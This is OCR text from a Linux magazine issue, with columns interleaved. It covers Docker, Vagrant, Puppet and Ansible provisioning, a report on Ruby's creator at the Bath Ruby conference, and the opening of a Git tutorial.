files you want to copy Docker Hub, https://hub.docker.com/explore
features of the host Linux kernel to the container using a
file called Dockerfile, we can use Docker Compose to automate
rather than just CPU features with no extension. We this in a single step. On the coverdisc we
have some examples have a sample Dockerfile with an Ansible
on the coverdisc and provisioning script that will install Ruby on
is an Nginx test page; we need to get some Filesilo, but the content in this case would be: Rails with a PostgreSQL database. Once you
HTML files into the Docker container, and have extracted the tarball the following pair
there are three ways of going about this. # FROM nginx of commands builds it:
One would be to run the container without # COPY content /var/www
detached mode so we can still SSH into it # VOLUME /usr/share/nginx/html $ docker-compose run web rails new
and transfer files using SCP. Another would . --force --database=postgresql
be to specify data directories when we first Once you are ready you would rebuild and run $ docker-compose build
launch our docker container. For example, your container using
you could map the contents of /var/www to Next replace the generated config/
nginx’s default web directory in Docker using: $ docker build -t mywebserverimage database.yml with our version so that
. Rails no longer tries to connect to the
$ docker run --name mywebserver4 -P host system, then run the following in
quick tip -d mywebserverimage two different terminal windows:
Roll your own containers
The easiest way to create your own You should then be able to see your new $ docker-compose up
containers is to fetch vanilla ‘ubuntu’ website being served at the new localhost $ docker-compose run web rake
or ‘coreos’ and customise it with your port mapping. db:create
Dockerfile. You can then use ‘docker Now, let’s say we have a more complex
build’ and ‘docker save’ to create and set of requirements, such as developing At this point you should be able to visit
export the final product. a database-driven website. Rather than the Rails welcome page via http://
manually specifying each individual container localhost:3000.
4 5 6
Check container status Access your container Destroy your container
You can view all the currently Connect to your container and run After fetching the container
installed container types using multiple commands using -it: ID using the second command
docker images. To get more useful in step 4, you can stop and remove that
information such as which containers are $ docker run -it busybox sh specific instance with $ docker rm -f
running and what they’re up to, you should # ls containerid. On successful deletion you
try: $ docker ps -a. # ps -a should see the containerid displayed.
www.linuxuser.co.uk 21
Feature Control Containers
V
agrant is a mature product
sponsored by a company called
Hashicorp. Its main purpose is to
provide a common command-line interface
and provisioning structure across different
virtualisation technologies. This means you
can use the same commands with Oracle
VirtualBox as you would with VMware
Workstation and Hyper-V. Vagrant
accomplishes this through the use of drivers
which provide a wrapper for the command-
line interface of whichever product you are
provisioning your virtual machines with.
This also means you can create a single
script to provision your server infrastructure,
and if your on-site servers run out of space
– or you use up all the licenses you’ve paid
for– the same VMs can be created using
a different product or cloud provider. This Above When only a GUI will do, you can edit your Vagrantfile to install a desktop and not run headless
makes Vagrant a very powerful tool for
sysadmins looking to roll out their own containerisation. Well, Vagrant can provision You’ll notice that no extra windows have
software-defined networks. Docker containers in exactly the same way it appeared on the screen. That’s because
Developers will also find Vagrant does with VMs. It’s also possible to deploy a Vagrant VMs run headless by default, so you
particularly useful because they can create Docker container on any virtual server within would access it using
a common desktop environment with all your network by setting it as the application
‘provisioner’ Vagrant $ vagrant ssh-config
runs after creating and $ vagrant ssh
Vagrant can provision Docker booting a VM.
The first step is to Any file that you place in the same directory
containers in exactly the same install your virtualisation as Vagrantfile will also be available to the
platform of choice. guest operating system under /vagrant.
way it does with VMs Vagrant supports Oracle However, you may wish to run a full GUI on
VirtualBox natively, as your VM, and in that situation a headless
long as you also install setup with only SSH access wouldn’t be
the required IDEs and tools installed and its associated extension pack. VMware particularly helpful. Fortunately, there’s a
roll this out quickly and easily for new team Workstation is also supported on local way to change this behaviour.
members. It’s also possible to simulate a desktops, but you will need to purchase the You may have noticed that when you ran
full server that’s more representative of proprietary Hashicorp driver for Vagrant to vagrant init, a file was created in the test
a production environment – particularly work with this ‘provider’. directory called Vagrantfile. This is where
useful for software testing. You may be Next, fetch the installer from www. you can tweak the settings for your VM, and
wondering how Vagrant ties in with app vagrantup.com. You should avoid installing by default it is filled with plenty of hand-
Vagrant through your package manager, as it holding comment lines to help you navigate
will often be an old version that may not be it. You will notice that config.vm.box
quick tip fully compatible with the latest and greatest defaults to base, or whatever you stated as
Managing Vagrant plug-ins release of VirtualBox. a choice when you
You can check which plug-ins have As soon as the install is complete you can ran the vagrant init
been installed with the command $ boot your first virtual machine, without any command. Scroll past
vagrant plugin list. Simply replace prior configuration, using just a few simple the sections for port
list with update to download new commands. For example: forwarding and shared
versions of these plug-ins, and to add folders, and you’ll find
new functionality try vagrant plugin $ mkdir test && cd test the following code line:
install vagrant-exec. $ vagrant init bento/ubuntu-18.04
$ vagrant up
22
products
Hot Vagrant plug-ins
Extending functionality is a vagrant
plugin install command away
1
BDD with Cucumber
With the help of vagrant-
cucumber, you can run all your
Above Hashicorp’s documentation covers provisioners, providers, command line help and Vagrantfiles behavioural tests locally against your
Vagrant VM. To launch them, copy your
# vb.gui = true to boot up, so you may prefer to save the pre-existing .feature files and step
current machine state and resume from it definitions to the Vagrantfile folder and
Unfortunately, just uncommenting that line instead. You can do this with run vagrant cucumber from there.
by removing the # won’t work. Vagrant is built
on Ruby, so you need to ensure the config. $ vagrant suspend
vm.provider line and its matching end are $ vagrant resume
also uncommented. Once you’ve saved your
changes you can restart the VM with You can gracefully shut down a VM by telling
it to halt, and once you’re done with the box
$ vagrant reload you can delete it with destroy. If you need
to verify the current state of your VM before
you run any commands
at all, you can get some
Uncomment a single line in
2
useful output from: Shell commands
vagrant-exec runs shell
your Vagrantfile to map port 80 vagrant status commands inside your VM,
and you can do this by navigating to the
to http://localhost:8080 It’s also wise to take Vagrantfile directory and prefixing
regular snapshots which each one with vagrant exec. It’s easy to
you can roll back to if remember and means you don’t need to
If all has gone well you should now see a VM you make any mistakes or run into problems. create a new SSH session each time.
window appear with a shell login prompt. The pair of commands you need for this are
The VM we specified earlier is a server
distribution of Ubuntu 18.04, so to install vagrant snapshot save REF
the GUI we would need to install ubuntu- vagrant snapshot restore REF
desktop through the package manager.
Just like real machines VMs take a while where REF is whatever you want to call your
snapshot. The first command creates the
snapshot while the latter restores from it.
quick tip We mentioned earlier that it’s possible
Create your own box to forward ports with your Vagrant VMs. By
3
It’s possible to create your own base default the only forwarded port is SSH, which Fabric provisioning
image for Vagrant and provision VMs is mapped to localhost:2222, and all others vagrant-fabric takes things
using it. You will need to tweak your base are inaccessible from the host system. a step further by enabling
image, populate a metadata JSON file Simply uncomment a single line in your you to execute scripted actions and
and then package it for your provider. Vagrantfile to map HTTP port 80 to http:// deployments with the help of a Python
Find out more at www.vagrantup.com/ localhost:8080. You can also copy and paste 2.7 extension called Fabric. Use it as a
docs/boxes/base.html. this line, editing the port numbers as needed provisioner in your project’s Vagrantfile.
for the app you’re running in your VMs.
www.linuxuser.co.uk 23
Feature Control Containers
V
agrant’s native support for Oracle image and run it, replace d.build_dir with:
VirtualBox is not your only option
for using it. Thanks to community # d.image = "nginx"
plug-in support and code contributions, it’s
also possible to use other providers. This is In both cases Vagrant is smart enough
particularly useful in enterprise settings to forward the right ports and set up a
where you might already be running folder share with the same directory as
your Vagrantfile. If
you’re trying to do
Unlike the Docker provider you either of these things Above Provisioning Docker containers with
on a non-Linux host Vagrant is handled just as elegantly as VMs
will need to install the OpenStack system, Vagrant will
attempt to provision everything with Puppet: see https://wiki.
provider as a plug-in a VirtualBox VM from openstack.org/wiki/Packstack.
a ‘boot2docker’ image Just like our Docker provider you can
first so it can still set use specific settings in your Vagrantfile to
something more scalable like OpenStack or up your Docker containers as instructed. provision new instances on OpenStack, and
VMware vSphere. As an example, you can OpenStack is intended to be a free and you can see a sample of this on its GitHub
use Docker as a provider for your Vagrant open source software platform for in-house page, http://bit.ly/lud_openstack. Unlike
configurations on Linux hosts just as easily cloud computing. OpenStack itself can be the Docker provider you will need to install
as you would VirtualBox. The only difference tricky to set up on test rigs and it needs the OpenStack provider as a plug-in:
is the exact set of commands you would use a lot of raw hardware power to be useful.
to do that in your Vagrantfile: Fortunately, you can use PackStack to build vagrant plugin install vagrant-
openstack-provider
# Vagrant.configure("2") do |config|
# config.vm.provider "docker" do quick tip If only one provider is specified your
|d| Try Kubernetes with Vagrant Vagrantfile should default to using it.
# d.build_dir = "." Sometimes Docker containers need to However if you have more than one
# end be deployed at scale and that’s where specified, or Vagrant doesn’t seem to
#end Kubernetes comes in. Try it out locally be detecting it, you can force a specific
with Vagrant by cloning the project’s provider choice:
This tells Vagrant to use Docker as a official GitHub project and running $
provider, and then instructs that provider to export KUBERNETES_PROVIDER=vagrant vagrant up --provider=openstack
build a container from the Dockerfile you’ve then $ ./cluster/kube-up.sh
provided. To directly download a container Another popular (albeit non-free) enterprise
Quick guide
Vagrant in the cloud
Scripting and managing your own servers have functionality in common with Azure
and in-house infrastructure is far from the and Google Cloud. As a result you may still
only use for Vagrant. There are community need to use a mix of Vagrant and custom
providers for a whole host of cloud scripts to get the most out of
platforms, which means that you don’t your subscriptions.
need to create new scripts for different However, if you just need to create the
APIs every time you want to create VPSs same EC2 instances on a regular basis,
with a new provider. and can skip tools like Elastic Beanstalk,
However, there are certain limitations. you can provision a VM by specifying your
For example, AWS creates new services AWS authentication settings and AMI
on an almost daily basis and there is only configuration using the sample Vagrantfile Above Hashicorp provides its own service for
a limited subset of its API that’s going to at http://bit.ly/lud_aws. provisioning VMs across multiple cloud providers
24
Top Left Vagrant makes light work of automating the provision of VM infrastructure with OpenStack
Above Left Provider plug-ins normally supply a handy sample Vagrantfile with the original source
Above Right Vagrant supports Hyper-V, but some extra manual preparation steps are required quick tip
Alternative provisioners
virtualisation platform is VMware vSphere. plug-in, but you’ll need to install a number In this feature we primarily focus on
Just like OpenStack it’s supported as a of packages before it will build and run Puppet and Ansible, but these are not
Vagrant provider once you’ve installed the correctly. You can find out which ones the only provisioning systems available.
plug-in for it: you need and how to install them on your Chef is a well-established alternative
distribution of choice at http://bit.ly/ and a new Python-based system called
vagrant plugin install vagrant- lud_libvirt. Another popular virtualisation SaltStack is now available. Both are
vsphere platform in many businesses is Hyper-V, an supported as Vagrant provisioners.
optional component for Windows that’s been
You have the choice of building from a box or available since Windows 8 and Server 2008.
re-using any from within vSphere. Any boxes This native hypervisor for the NT kernel was to choose one or the other to run on your
you create with VMware Workstation will originally created to replace the venerable host system. It gets a little worse, too, as
usually work with vSphere after some minor Microsoft Virtual PC, an application that Vagrant is not able to control everything it
tweaks because of the shared underlying can be best described as a Windows-only needs to with Hyper-V to fully function right
technology, although you may find it easier alternative to VirtualBox. away. For example, it isn’t able to create or
to simply import the VM image through the It’s fair to say that Hyper-V is a lot more configure new virtual networks on the fly,
management console and use it as a server sophisticated, isolating virtual machines so you’ll need to set this up manually before
template instead. Read more at http://bit. into their own ‘partitions’ and intercepting you start using it. Similarly it’s unable to
ly/lud_vsphere. automatically set
Finally, if the virtualisation product you a static IP address
use is based on the XenServer hypervisor, Bear in mind that while Hyper-V or automatically
you’re also in luck. The vagrant- configure NAT access
xenserver provider plug-in is enabled on your system, Oracle to the rest of your
requires you to create your network. There’s more
own boxes, but fortunately you VirtualBox won’t run info at http://bit.ly/
have some options. XVA files lud_hyperv.
stored locally on the hard disk If you can get
or at a network location are any direct calls to the hardware at the past these limitations, your main hurdle
supported, as are generic kernel level. It’s also the system on which will be in creating compatible boxes.
VHD files, which you can the official Windows port of Docker relies in Windows guests will need to have Windows
create in any VirtualBox order to function, although you’ll typically Remote Management up and running and
VM. See http://bit.ly/lud_xen find you’ll need to switch that off to avoid an OpenSSH server installed to function
for more on this plug-in. problems when you interact with Hyper-V correctly, and you will likely need to use the
KVM is also supported directly with Vagrant. Bear in mind that PuTTy SSH client (www.putty.org) because
as a provider by the while Hyper-V is enabled on your system the vagrant ssh command doesn’t work on
vagrant-libvirt Oracle VirtualBox won’t run, so you will need Windows by default.
www.linuxuser.co.uk 25
Feature Control Containers
Puppet provisioning
Centrally manage application deployments and server configuration files
P
uppet’s main function is to manage of network services and restart them as
configuration for Linux and needed. It can also verify if a specific version quick tip
Windows boxes across the network of a package has been installed or not. Should I use Puppet Enterprise?
by slaving their settings to a common The first thing you will need to get started The commercial version of Puppet
‘master’ configuration called a ‘catalogue’. is a Puppet master and at least one server provides server-auditing tools,
The key benefit of this is that you can set running the agent software. To accomplish a browser-based GUI for Hiera, support
common configurations for your servers in this with Docker we need to create two for provisioning VMs, sophisticated
one place rather than having to do it containers and tie them together in the same role-based access control and a support
manually on each server. emulated subnet so they will detect each contract. It’s up to you as to whether
This should, in theory, mean fewer hard- other, like so: these extras are worth the cost.
to-troubleshoot typos and confusing log
messages being caused by bad configuration $ docker network create puppet
values. However, Puppet takes this a step $ docker run --net puppet --name provisioned with Vagrant, you’ll first need
further by enabling you to define settings for puppet --hostname puppet puppet/ to create a VM with your Puppet master
smaller clusters of servers or even individual puppetserver-standalone installed and forward ports 22 and 8140. You
boxes from that same master server. As long $ docker run --net puppet puppet/ would then need to ensure you configure the
as the slave is running the supplied agent puppet-agent-alpine Puppet provisioner in the second VM to point
at the master. The code you need for the
In this example, the Puppet agent’s Vagrantfile looks like this:
This should (in theory) mean Puppet agent will spot
the server, fetch the # config.vm.provision "puppet_
fewer hard-to-troubleshoot typos latest configuration server" do | puppet |
and then immediately # puppet.puppet_server =
and confusing log messages terminate. The developer "server.domain"
has provided much # end
better examples that
software, and it has synced with the master make use of Docker Compose, as well as Simply change server.domain to the
at least once, it will respect any changes documentation on how to tweak catalogues, hostname or external IP address of your
you decide to make to its environment. on GitHub: http://bit.ly/lud_puppet. Puppet master and it should connect
Puppet can track the current running state To accomplish the same thing using VMs when you build your VM. A more advanced
example using shell scripts and multiple
folder shares is available at http://bit.ly/
lud_puppetmaster.
To install the Puppet server through the
package manager on natively installed Linux
setups – or your Puppet Master VM if you
chose to use a vanilla Vagrant image – you
will first need to enable the Puppet package
repositories. For Debian-based distros you
can fetch a matching DEB file from https://
apt.puppetlabs.com, while Yum-based
distros need the relevant RPM from https://
yum.puppetlabs.com/puppet5. Once that’s
done installation is as simple as installing
the puppetserver package.
Installing the agent on other servers
follows exactly the same process as
installing the master, but you install puppet
instead of puppetserver. The default
hostname of the Puppet server is puppet
unless you change this manually, so this
Above If the hostname of your Puppet master is ‘puppet’, every agent on the same network or subnet is what you would configure your installed
will detect it automatically on launch and sync the catalogue straight away Puppet agents to look for.
26
It’s also highly recommended that you set
up a good NTP service on your Puppet master
server, because syncing between it and all
servers running the agent requires the use of
time-limited certificates. If the system clocks
are too far out of sync the servers will refuse
to accept any new changes. Finally, you can
how to
Manage environment variables with Hiera
1 2 3 4
Edit hiera.yaml Write a Set common values Verify your facts
This file lists the custom module Head to the data/ After successfully
‘facts’ you want to Create a new module directory in the compiling your module
track. With a config folder of called ‘profile’ and write a test production environment and test class you can verify
/etc/puppetlabs,define class for it, ensuring it uses folder and set your variables your settings with:
searchable folders in puppet/, parameters with memorable in common.yaml. The keys
common variables in code/ names and sensible data types. you define should follow $ puppet lookup
environments/production/ Writing a test manifest is the pattern profile::test_ profile::test_
and package settings in code/ optional, but it can be helpful class::parameter and their class::parameter
environments/production/ when troubleshooting your values should to match the data --environment production
modules/<modulename>. module and key values later. types you set in your module. --explain
www.linuxuser.co.uk 27
Feature Control Containers
Configure Ansible
Manage your applications and configuration with Red Hat’s answer to Puppet
Quick guide
Installing Ansible
The most straightforward way to get
Ansible up and running is by installing
it through through the pip package
manager distributed with Python.
However, you can also install it through
your distro’s package manager.
Above Playbooks are Ansible’s equivalent of Puppet’s Manifests. The decision to use YAML and a Unfortunately the latest version won’t
straightforward task-based structure helps keep the learning curve shallow for devops teams be in the main channels by default,
so there’s a little extra legwork to
P
uppet is far from the only system requires you to download a special SDK and do. RHEL 7 users need to enable the
you can use to centrally manage consult your resident ‘subject matter expert’ Extras repository before Ansible can
the provisioning of applications. on its internal workings. be installed through yum, while older
Ansible prides itself on being easy to learn However, the main downside is there’s no versions will need you to enable EPEL.
and is in many ways a lot simpler to use than central community repository for pre-built Meanwhile, Ubuntu users can install
its rivals. Puppet, for instance, relies on Ansible modules and playbooks to match the the latest package from the project’s
agents that request manifests and poll for equivalents for Docker, Vagrant and Puppet. PPA; just run the following command to
changes before they can edit files and run As a result you may have to scour GitHub add that:
custom tasks. Ansible, on the other hand, for helpful module code. Thankfully, in the
doesn’t require any agents, instead reading case of playbooks the situation is helped $ sudo apt-add-repository
plain English definitions of tasks you want to significantly by the comprehensive project ppa:ansible/ansible
perform on-the-fly from a YAML file, known documentation and a community of bloggers.
as a playbook. As mentioned Ansible’s playbooks are
Ansible itself is also built on Python rather defined in YAML, and each ‘play’ in that file controlling how to respond if services go
than Ruby, so you may find that writing follows a consistent pattern. First, you define down or certain files change. You can also
custom modules yourself has a shallower the hosts (servers) that the play will apply configure them to listen for other tasks being
learning curve than Puppet, which often to, and which users Ansible should run as run and send notifications or log messages
on those machines. You would use the ‘root’ wherever they’re needed. Execute it with:
remote user to install packages and edit
quick tip sensitive files, but if you’ve disabled root $ ansible-playbook myplaybook.yml
Taking things a step further logins over SSH you can elevate yourself in -f 10
You will find more documentation for the next stage.
Ansible Core and Ansible Tower (the That next stage is where you define your If your playbook is tracked in a git repository
enterprise version that provides a pretty tasks. Typically you will want to set a name you can also clone and run that YAML file with:
web GUI) at https://docs.ansible.com. for each of them, for logging purposes, and
This covers setup steps, playbooks and then tie each to a service or command. You $ ansible-pull -U [email protected]
modules for every supported version in can also use a template file to overwrite myplaybook.yml
much greater detail than we’re able to fit existing configuration files on those
in this, already packed, feature. destination servers. Finally, you set up your That’s enough to get you started. Now,
handlers, which tell the machines you’re it’s time to dive in yourself!
28
ON SALE NOW!
free
gift!
Simply stick
CableDrops
anywhere you
need them
30
Only
DE
£32
Install today!
usn 2
b
ubuntu Mate
traditional desktop metaphor
ContaIners
.0
for a six-month
+ all tutorial code All the power of Ubuntu + MATE’s traditional
Disclaimer
In no event will Future Publishing Limited
Contact
Future Publishing
Please note
This DVD autoboots to a menu,
desktop experience + enhanced HiDPI support
subscription
accept liability or be held responsible for any Quay House so simply insert the disc and
MX lInuX 17.1
viruses and spyware. We do still recommend % +44 (0)1225 442244 your PC manufacturer’s
that you run a virus checker over this disc Website: www.linuxuser.co.uk instructions. Thanks for
before use. Future Publishing Limited cannot Subscriptions supporting Future Publishing.
guarantee that at the time of use, hyperlinks Subscribe to Linux User & Developer today! 2018 Future Publishing Ltd.
direct to that same intended content, as Future
Publishing has no control over the content % UK 0844 249 0282
free with
delivered by these hyperlinks. Unless otherwise Overseas +44 1795 419161
issue 191
Email: [email protected]
stated, all software on this disc is distributed
in accordance with the GNU General Public 6-issue subscription (UK) – £32 a fast, friendly and stable linux distribution
13-issue subscription (Europe) – €88
License. For more information on the GNU GPL
loaded with an exceptional bundle of tools
THE MAgAzInE for
THE Gnu GeneratIon
MX lInuX 17.1
LUD191.dvd_wallet.indd 1
please visit www.gnu.org/licenses/gpl-3.0.txt.
License. For more information on the GNU GPL
13-issue subscription (World) – $112
13-issue subscription (Europe) – €88
loaded with an exceptional bundle of tools 06/04/2018 09:57
guarantee that at the time of use, hyperlinks Subscribe to Linux User & Developer today! 2018 Future Publishing Ltd.
before use. Future Publishing Limited cannot Subscriptions supporting Future Publishing.
that you run a virus checker over this disc Website: www.linuxuser.co.uk instructions. Thanks for
Never miss an issue Delivered to your home Get the biggest savings
without systemd. comes with a including Vulners Scanner for
next edition of devuan, the distro included a few tools of the trade,
an incredibly solid beta of the is something of an art – and we’ve
devuan 2.0 asCII (beta) look at privilege escalation, which
computer Security this issue, we
MX tools dashboard. samples and puppet manifests. in
administrative utilities into its dockerfiles, ansible playbook
packs an excellent selection of want to grab our example scripts,
a custom Xfce desktop which
ubuntu Mate
containers feature (on p18), you’ll
a middleweight distro using
13 issues a year, and you’ll be Free delivery of every issue, Get your favourite magazine
if you dived straight into our control
MX linux 17.1 all the tutorial code
for crisper, more detailed images.
1.20 which now has Hidpi support
february’s new release of Mate
18.04 ltS, this benefits from
ContaIners
sure to get every single one direct to your doorstep for less by ordering direct
foundations of the latest ubuntu
today! Built on the solid
traditional desktop metaphor
0.
Install today!
Sample a modern take on the
2
su
lp
D E
www.linuxuser.co.uk 31
Feature Special Report: Ruby
RUby is
alive
& well
Dan Bartlett
The creator of Ruby, declares “We will do everything to
survive” in his first UK keynote speech in five years.
Chris Thornett reports from the Bath event
“
How is software born?” It’s an unusual first followers. Its syntax, for instance, is very readable but
question from the genial Japanese creator expressive in a terse way, and as a dynamic, reflective,
of the Ruby programming language, object-oriented, general-purpose programming
KEY INFO Yukihiro ‘Matz’ Matsumoto. He’s making his language it’s intuitive and easy to learn. Ruby tries not
The annual Bath first keynote speech in the UK in five years to over 500 to restrict those who use it, or as Matz is often quoted,
Ruby conference Ruby developers at the annual two-day Bath Ruby “Ruby is designed to make programmers happy.”
is the biggest Ruby Conference. Ruby celebrated its 25th year in February But not everyone is happy. The popularity of the
developer event in although officially its first release, 0.95, was in language has been bolstered for many years by the
the UK and takes December 1995, so in answer to his own philosophical dominance of the Ruby on Rails (RoR) web application
place over two question, Matz suggests that software is born when it framework, particularly among startups who wanted
days, with a mix of is named. It’s the kind of poetic answer you expect from something to deal with much of the heavy lifting. That
technical and non- the creator of such an expressive language and means popularity saw the Ruby language soar to fifth place in
technical speakers Ruby was ‘born’, at least for Matz, two years earlier on the RedMonk Language Rankings in 2012, and rank in
plus workshops (not 24 February 1993 – hence the big celebration in Tokyo the top 10 in other indexes.
to mention karaoke). earlier this year and across social media. Talking of the Since then, Ruby has drifted down to eighth. RoR,
https://bathruby.uk language’s origins, Matz says he wanted to name it although popular, isn’t the superstar it once was
after a jewel: “Ruby was short, Ruby was beautiful and and has faced fierce competition as issues such
more expensive, so I named my language Ruby,” he as scaling have become a greater concern for older
says, joking with his community. web companies. Although not directly comparable
However, Matz isn’t in the UK for the first time in five and with its own limitations, the JavaScript run-time
years just to eat birthday cake. Ruby may have reached environment Node.js, for example, has become popular
maturity, but there are still questions over whether for its runtime speed at scale, ease of adoption for
it can survive another 25 years. Like its creator, the back-end use by front-end JavaScript users, and
Ruby language is very likable and garners passionate its single-threaded approach to handling multiple
32
connections, among other things (although that does
make it less suitable for CPU-intensive tasks such as spotlight
image processing). Sharing recipes with Ruby
It’s clear Matz is aware that the adoption of any
programming language is stimulated by the projects and
frameworks that grow from a language’s community and
ecosystem – and RoR is an astonishing example of that.
So while he was keen to use his keynote to express his
regret for past mistakes he’d made in the language, he
also wanted to define a path to address the performance
and scaling issues.
Matz focused on two key trends: scalability, and what
he calls the “smarter companion”. To combat scalability
and create greater productivity, Matz believes that
“faster execution, less code, smaller team [are] the keys
for the productivity.” Computers are getting faster, he Above Cookpad’s CTO Miles Woodroffe: “You stumble upon
told the packed hall, but it’s not enough: “We need faster little tiny improvements to the language in every release,
execution because we need to process more data and so it’s a really fun language to work with”
more traffic. We’re reaching the limit of the performance
of the cores. That’s why Ruby 3.0 has a goal of being three Cookpad (https://cookpad.com/uk), the main
times faster than Ruby 2.0” – or, as he puts it, “Ruby3x3”. sponsor of the Bath Ruby conference, is a classic
example of a web company that relies heavily on
Ruby and Ruby on Rails. It’s a recipe-sharing site,
More code is more and while CTO Miles Woodroffe says the site has
over 60 million users a month in Japan, it’s also
maintenance, more expanding globally, having moved its international
HQ to Bristol. “We’re really invested in Ruby
debugging, more time, as a platform,” Woodroffe told us. “A lot of our
infrastructure is powered by Ruby scripting –
less productivity Ruby for everything pretty much.”
As well as having 100 Ruby engineers dotted
around the world, Cookpad employs two core
“This is easy to say,” Matz acknowledges, adding that Ruby team members full-time. One of them
in the days of 1.8, Ruby was “too slow” and a mistake. is Koichi ‘ko1’ Sasada, creator of YARV – the
Koichi ‘ko1’ Sasada’s work on YARV (Yet another Ruby VM) official interpreter for Ruby since 1.9. Sasada
improved performance for Ruby 1.9, and “since then,” is now working on concurrency (Project Guild)
says Matz, “we have been working hard to improve the and it’s another way Woodroffe expects to see
performance of the virtual machine, but it’s not enough.” performance gains. Ruby 3, however, is the game
changer: “It’s quite a huge paradigm shift in how
Time for JIT Ruby is built and interpreted,” says Woodroffe.
To improve performance further Ruby is introducing JIT “So if we get this three times performance for
(Just-In-Time), a technology already used by JVM and everyone [...] less resources will be needed to do
other languages. “So we’ve created a prototype of this the same thing and probably save us money.”
JIT compiler so that this year, probably on Christmas Day,
Ruby 2.6 will be released,” Matz confirms. You can try
the initial implementation of the MJIT compiler in the 2.6 library file. The RubyVM can then use that cached,
preview1 (http://bit.ly/Ruby2-6-0-preview1). Currently, precompiled native code from the dynamic library the
you can check and compile Ruby programs into native next time the RubyVM sees that same YARV instruction.”
code with the --jit option. Matz says it’s “not optimised” Scalability, Matz also believes, should mean creating
although for “at least CPU intensive work it runs two less code, as “more code is more maintenance, more
times faster than Ruby 2.0,” which he feels “offers a lot debugging, more time, less productivity,” and, he joked,
of room to improve performance of the JIT compiler”. “more nightmare.” Less Ruby code isn’t going to mean
For CPU-intensive tasks, in particular, Matz sounds significant changes to the language’s syntax, however,
confident that they would be able to accomplish the x3 largely because there’s little room for change: “We have
performance improvement. run out of characters. Almost all of them are used,” says
Probably the clearest overview explanation of how Matz. Being an exponent of egoless development, he’s
MJIT works is supplied by Shannon Skipper (http:// also not prepared to change the syntax for the sake of
bit.ly/RubysNewJIT): “With MJIT, certain Ruby YARV his pride and see existing Ruby programs broken, so he
instructions are converted to C code and put into a .c file, was careful to say that they weren’t going to change Ruby
which is compiled by GCC or Clang into a .so dynamic syntax that much.
Feature Ruby
34
Q&A
Creator of Ruby,
Yukihiro ‘Matz’ Matsumoto
What is it about programming
languages that fascinate you?
The programming language is the way to express
what you want a computer to do in a way that
both we humans and computers can understand.
It’s kind of a compromise. But at the same time
it is the programming language that is the way
to express your thoughts in a clear manner so
Above The first Ruby Hack Challenge outside of Japan reflects a that it is also a tool to express your ideas. Think
drive to see more contributors from the global Ruby community about that – you can write down your software
on a sheet of paper, so it doesn’t execute on the
Matsumoto also touched on Ruby becoming a “smarter computer simply because it can’t see the paper,
companion” as well as the programmer’s best friend. but it is still a program and it will still help you
“We [are] now at the beginning of smarter computers, so, understand what you want to do.
for instance, RuboCop [static code analyser] is one way Programming languages have different ways
of helping you.” Matz also suggested that in the future, to express ideas, how to organise the software
when you compile a program “Ruby could suggest [for structure or maybe providing some kind of
example] ‘You called this method with an argument string abstraction. It’s that part, it’s that psychological
but [did] you expect to call this method with integer?’”. aspect of the language that’s motivated me to
After his keynote, Matz described this programming work on it for the last 25 years.
interactivity to be something like Tony Stark’s Jarvis.
Essentially, he wants to see “an AI that will interact with Have you always been a fan of open source
me to organise better software.” software? Was that always your intention when
creating Ruby?
Actually, when I was school I studied
We will have it so that programming a lot from reading the source code
from free software, like [GNU] Emacs and other
every Ruby 2 program free software tools, so it was so natural for me
to make my software free or open source, unless
will run in Ruby 3 I have some constraint like the software was
owned by the company or something like that. But
Ruby was originally my hobby project.
Change brings with it the possibility of software that no
longer works as intended, or indeed at all. It’s a concern Have you encountered people who are afraid
that haunts Matz from past mistakes: “In the past we of the changes to Ruby?
made a big gap, for example between 1.8 and 1.9,” he We made several mistakes designing the
says. “We made a big gap and introduced many breaking language, but if we fix them in the future that
changes, so that our community was divided into two for would break so much code, so we’ve given up that
five years.” Matz sees this as a tragedy: “We’re not going kind of fix. Fixing the issues would satisfy us and
to make that mistake again so we will do a continuous our self-esteem, but it is not worth it to harm the
evolution. We’re going to add the JIT compiler to 2.6 and big codebase. For example, if I make this small
not wait until Ruby 3.0, were going to add some type of breaking change that would affect 5 per cent of
concurrent abstraction in the future in Ruby 2.7 to 2.8, the users that could improve performance by a
but it will not be a breaking change. We will have it so that factor of two, I would like to do that... but I’m not
every Ruby 2 program will run in Ruby 3.” going to do a change for my sense of self-esteem.
Reversing Ruby’s current slow trajectory downwards is
not going to be an easy task and Matz seems to realise How do you feel about people who say Ruby is
this: “Ten years ago Ruby was really hot, because of Rails. dead – does it bother you much?
These days Ruby isn’t considered hot, but it is stable.” [Laughs] Yeah, I don’t mind criticism. If someone
Indeed, Ruby has crossed that gap into maturity and has some bad thing about the language they
Matz has no intention of giving up on it any time soon: just leave without saying anything. But having
“Ruby is a good language to help you become productive criticism is an indication that we have something
and I want Ruby to be like that for forever, if possible. to improve. I welcome that kind of criticism so we
That means we have to evolve continuously forever, so we can take it constructively.
can’t stop; we can’t stop.”
Tutorial Essential Linux: Git
part one
Wget
Install through your
package manager
or from www.gnu.
org/software/wget
Above GitHub provides a user-friendly way to host and browse through Git projects
36
The first step is to create a new repository, which we
Figure 1
will do on the GitHub website. Navigate to the home page
at https://github.com and click the button that says
‘Start a project’. A page will appear asking for a project
name and some other information. Since GitHub projects
need to have unique names, we cannot suggest a
particular name for you to use, so you’ll need to come up
with your own name for the project; try to include ‘Emma’
somewhere in order to make it clear what the project is
about. If you like, write a description of the project.
Tick the box that says ‘Initialize this repository
with a README’. This will create a README file inside
the repository that we can use to record important
information about the project. More importantly, creating
this file will initialise the repository so that we can start
working with it on our computer.
Click ‘Create repository’ in order to create the
repository; we arrive at the home page for our new
repository. The GitHub website enables us to make lots it means that if two people are working on a file at the Above GitHub makes
of changes online, but from now on we’ll stick to using Git same time, we have a chance to reconcile the changes. it very easy to copy the
from the command line. It’s time to initialise the repository by adding some link that enables us to
files. In order to download Jane’s novel, run the following: unlock the power of Git
at the command line
Git is not tied to GitHub $ wget www.gutenberg.org/files/158/158-0.txt
-O novel.txt
in any way; however, $ sed -i -e 's/\r//' novel.txt
this website is the most We now have a file, novel.txt, that contains the text of
the novel. The second command converts the text file Readme
commonly used repository newlines from DOS to UNIX format. It’s traditional to
Before we do anything else, let’s push this new file to initialise a GitHub
of Git projects the online repository. When we do this, it’s a good idea repository with
to check the status of our local branch by running the a file, README.
following command: md, that contains
